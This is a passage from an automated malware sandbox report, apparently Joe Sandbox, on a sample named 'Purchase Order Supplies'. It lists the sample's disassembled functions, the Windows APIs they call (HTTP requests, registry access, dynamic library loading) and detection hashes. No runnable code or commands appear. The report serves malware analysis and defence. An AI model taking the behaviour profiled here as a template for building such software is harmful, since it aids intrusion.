                          • VariantClear.OLEAUT32(?), ref: 00CEB73A
                            • Part of subcall function 00CDA6F6: VariantInit.OLEAUT32(00000000), ref: 00CDA736
                            • Part of subcall function 00CDA6F6: VariantCopy.OLEAUT32(?,?), ref: 00CDA73F
                            • Part of subcall function 00CDA6F6: VariantClear.OLEAUT32(?), ref: 00CDA74B
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4237274167-1221869570
                          • Opcode ID: a1104020bcddc3aadcc68a79f76d61917f6b20f9ef44c481762adad26513880b
                          • Instruction ID: aab2a752f411f5c994ae40a8a1489b226f018b7098186ac578e04d1c0c4316ec
                          • Opcode Fuzzy Hash: a1104020bcddc3aadcc68a79f76d61917f6b20f9ef44c481762adad26513880b
                          • Instruction Fuzzy Hash: 15918A706083419FCB14DF29C48496BB7E8AF89700F14486EF89A9B362DB30ED45DB52
                          Function 00CD1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00CD10B8
                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CD10EE
                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CD10FF
                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CD1181
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorMode$AddressCreateInstanceProc
                          • String ID: DllGetClassObject
                          • API String ID: 753597075-1075368562
                          • Opcode ID: e138d9db11f9aeaf6b9fa4a5383a1cdfb1413f3ff14db3bc439f145daeb08a02
                          • Instruction ID: 9e887b069f4b929fefed8cf470d75b56637e061289fb5850d49b5c7896e25cbe
                          • Opcode Fuzzy Hash: e138d9db11f9aeaf6b9fa4a5383a1cdfb1413f3ff14db3bc439f145daeb08a02
                          • Instruction Fuzzy Hash: 8F412CB1600205FFDB15CF55C884A9A7BB9EF44354F1880AAEE09DF305D7B1DA84CBA0
                          Function 00CD5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00CD5A93
                          • GetMenuItemInfoW.USER32 ref: 00CD5AAF
                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00CD5AF5
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D518F0,00000000), ref: 00CD5B3E
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem_memset
                          • String ID: 0
                          • API String ID: 1173514356-4108050209
                          • Opcode ID: e61c34dd7a3b2898a9f577b711c19fa8d852ff8a0143280418e18086b2972910
                          • Instruction ID: 4360eb0fab613f03d9a5e80a9946a47806d02ce501f19680c7ae6c52447cad77
                          • Opcode Fuzzy Hash: e61c34dd7a3b2898a9f577b711c19fa8d852ff8a0143280418e18086b2972910
                          • Instruction Fuzzy Hash: DE418171204701AFDB10DF24C884B6ABBE5AF89714F14461FFAA99B3D1D770E901CB62
                          Function 00CF0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00CF0478
                            • Part of subcall function 00C97F40: _memmove.LIBCMT ref: 00C97F8F
                            • Part of subcall function 00C9A2FB: _memmove.LIBCMT ref: 00C9A33D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove$BuffCharLower
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 2411302734-567219261
                          • Opcode ID: 73ca299211529cb9d1f948570bd541d3a561342157e976daf75a9e6a2f591740
                          • Instruction ID: d981ce56675067512265e8ff4ce0dce2423ebede5673238574361afea51e55c2
                          • Opcode Fuzzy Hash: 73ca299211529cb9d1f948570bd541d3a561342157e976daf75a9e6a2f591740
                          • Instruction Fuzzy Hash: F031B43450061AAFCF00DF98C841AFEB3B5FF05750B208A29E562A72D2DB71EA05DF91
                          Function 00CCC600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CCC684
                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CCC697
                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CCC6C7
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 458670788-1403004172
                          • Opcode ID: 8beaa2f450adcc76efb78b368f9947475b4cc9778e0f4a4f130a4cef451693b5
                          • Instruction ID: 0c351ee9fd37f425617f07c97aae9950aa64b1bbc254a2442836a97d16283285
                          • Opcode Fuzzy Hash: 8beaa2f450adcc76efb78b368f9947475b4cc9778e0f4a4f130a4cef451693b5
                          • Instruction Fuzzy Hash: BF21D171900108BFDB04EB64C88AEFFB7A9DF56350B24861DF426E71E0DB745D0AA724
                          Function 00CE4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CE4A60
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CE4A86
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CE4AB6
                          • InternetCloseHandle.WININET(00000000), ref: 00CE4AFD
                            • Part of subcall function 00CE56A9: GetLastError.KERNEL32(?,?,00CE4A2B,00000000,00000000,00000001), ref: 00CE56BE
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 1951874230-3916222277
                          • Opcode ID: 79ea1164763b2a37581af0518bb3ba1fcca1837815d606eacb23fa4788dfe74d
                          • Instruction ID: fbcd519a070074baa8569bc7f37177a2ac06442a31d2515970c16104890c9b20
                          • Opcode Fuzzy Hash: 79ea1164763b2a37581af0518bb3ba1fcca1837815d606eacb23fa4788dfe74d
                          • Instruction Fuzzy Hash: 8E21FFB5540208BFEB15DF669C85EBBB6FCEB88758F10402AF116D2240EB609E05A771
                          Function 00C938E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D0454E
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • _memset.LIBCMT ref: 00C93965
                          • _wcscpy.LIBCMT ref: 00C939B5
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C939C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                          • String ID: Line:
                          • API String ID: 3942752672-1585850449
                          • Opcode ID: b6abfa1b56a30accea28aa66e50715fab51f371b082328bc8710ac6c5f249abb
                          • Instruction ID: ccadca28cdeba056499d280801640222e23dc4114f43eb00dc9c145569eab022
                          • Opcode Fuzzy Hash: b6abfa1b56a30accea28aa66e50715fab51f371b082328bc8710ac6c5f249abb
                          • Instruction Fuzzy Hash: A031C771408380ABDB21EB64DC49FDB77E8AF54311F04451AF999C22E1DB709B48DBA2
                          Function 00CF8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAC657
                            • Part of subcall function 00CAC619: GetStockObject.GDI32(00000011), ref: 00CAC66B
                            • Part of subcall function 00CAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAC675
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CF8F69
                          • LoadLibraryW.KERNEL32(?), ref: 00CF8F70
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CF8F85
                          • DestroyWindow.USER32(?), ref: 00CF8F8D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                          • String ID: SysAnimate32
                          • API String ID: 4146253029-1011021900
                          • Opcode ID: d580f8f981d8e40857be94464f07218a3189606fa13f361f6f0e3a33882f4223
                          • Instruction ID: b0aa402bd81a7e6ef8e3b53f61f2d0b3d9bf4de9b533c04be419e843cdb6f615
                          • Opcode Fuzzy Hash: d580f8f981d8e40857be94464f07218a3189606fa13f361f6f0e3a33882f4223
                          • Instruction Fuzzy Hash: 1C218B71200209AFEF504EA4DC80EBB77AAEB49364F104628FB2497190CB71DD559762
                          Function 00CDE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00CDE392
                          • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00CDE3E6
                          • __swprintf.LIBCMT ref: 00CDE3FF
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00D2DBF0), ref: 00CDE43D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume__swprintf
                          • String ID: %lu
                          • API String ID: 3164766367-685833217
                          • Opcode ID: 1b6e162676bdd7f1d51e13737f92a1e0c009f002feacacae43b2f047d8f994be
                          • Instruction ID: f9bfd8a196468d28f908b5cd6fdab6a1b84c89e46326db3cb82dbb0b0b20c2f0
                          • Opcode Fuzzy Hash: 1b6e162676bdd7f1d51e13737f92a1e0c009f002feacacae43b2f047d8f994be
                          • Instruction Fuzzy Hash: 32214135A40209AFCB10EFA4C885DEE77B9EF59714F108069F509DB351DB31DA46DB60
                          Function 00CCD7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                            • Part of subcall function 00CCD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCD640
                            • Part of subcall function 00CCD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCD653
                            • Part of subcall function 00CCD623: GetCurrentThreadId.KERNEL32 ref: 00CCD65A
                            • Part of subcall function 00CCD623: AttachThreadInput.USER32(00000000), ref: 00CCD661
                          • GetFocus.USER32 ref: 00CCD7FB
                            • Part of subcall function 00CCD66C: GetParent.USER32(?), ref: 00CCD67A
                          • GetClassNameW.USER32(?,?,00000100), ref: 00CCD844
                          • EnumChildWindows.USER32(?,00CCD8BA), ref: 00CCD86C
                          • __swprintf.LIBCMT ref: 00CCD886
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                          • String ID: %s%d
                          • API String ID: 1941087503-1110647743
                          • Opcode ID: 01b07f4c37b53e56df0cac3c75b2711bab33e28c1c25ce8b0924e93a01423318
                          • Instruction ID: 7b68fbbb3009599d03cd71591f9c4ae47cfe6732aff904cd113ca33d26711569
                          • Opcode Fuzzy Hash: 01b07f4c37b53e56df0cac3c75b2711bab33e28c1c25ce8b0924e93a01423318
                          • Instruction Fuzzy Hash: FB114F755003097BDF11BF60DC8AFEA3769AB54704F0080B9FA1AAB186DBB49945EB70
                          Function 00CF1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CF18E4
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CF1917
                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CF1A3A
                          • CloseHandle.KERNEL32(?), ref: 00CF1AB0
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                          • String ID:
                          • API String ID: 2364364464-0
                          • Opcode ID: 2bb96c5927106f714372244bc4c49c4f4395a1acbfe219a8c3c30cc5e0ae7d9c
                          • Instruction ID: 248797c24fca51895da87cb423d4375513aeb9a743ffd075a3776b99d68cfa91
                          • Opcode Fuzzy Hash: 2bb96c5927106f714372244bc4c49c4f4395a1acbfe219a8c3c30cc5e0ae7d9c
                          • Instruction Fuzzy Hash: 2B81AF70A40215EBDF10DF64C886BADBBE5BF48724F088059FD15AF382DBB4E9419B91
                          Function 00CF0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00CF05DF
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00CF066E
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CF068C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00CF06D2
                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 00CF06EC
                            • Part of subcall function 00CAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF282
                            • Part of subcall function 00CAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF2A6
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                          • String ID:
                          • API String ID: 327935632-0
                          • Opcode ID: 66b3d110cf388ae78f3c1084ada33c136f4a333fc10a99ad0140cb9b8b464ca0
                          • Instruction ID: 66b5af6a0714055d3df12eb97f19e5a65fd6853c6de917ea6389a05421b18fc3
                          • Opcode Fuzzy Hash: 66b3d110cf388ae78f3c1084ada33c136f4a333fc10a99ad0140cb9b8b464ca0
                          • Instruction Fuzzy Hash: 65515975A00209AFCF00EFA8C8949EDB7B5BF58310B148095FA15EB352DB30ED45DB91
                          Function 00CF2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                            • Part of subcall function 00CF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2AA6,?,?), ref: 00CF3B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF2DE0
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF2E1F
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CF2E66
                          • RegCloseKey.ADVAPI32(?,?), ref: 00CF2E92
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF2E9F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                          • String ID:
                          • API String ID: 3440857362-0
                          • Opcode ID: 4beec83428ba974df4c76287727e5393723cec22061f22635d93f8920076c60d
                          • Instruction ID: eb0718a97e64288a076128161481cc77bec5026d881763085ded1f5d7cd6c1c6
                          • Opcode Fuzzy Hash: 4beec83428ba974df4c76287727e5393723cec22061f22635d93f8920076c60d
                          • Instruction Fuzzy Hash: AB515A71204209AFCB04EF64C885E6AB7E9FF88304F14481EF696972A1DB31E905DB52
                          Function 00CFCB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fdbef76612f930c47f1ab5211d2db57912c74db65c5117d27f514a021b21276d
                          • Instruction ID: 00f5377e3d5e37913943f2cda916178356a7298748c010fa06d3264720ee7f1d
                          • Opcode Fuzzy Hash: fdbef76612f930c47f1ab5211d2db57912c74db65c5117d27f514a021b21276d
                          • Instruction Fuzzy Hash: 9941E439A0020DBFD760DB28CEC9FF9BB65AB09320F154255EA29E72D1C7309E01D661
                          Function 00CE1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CE17D4
                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CE17FD
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CE183C
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CE1861
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CE1869
                          Memory Dump Source
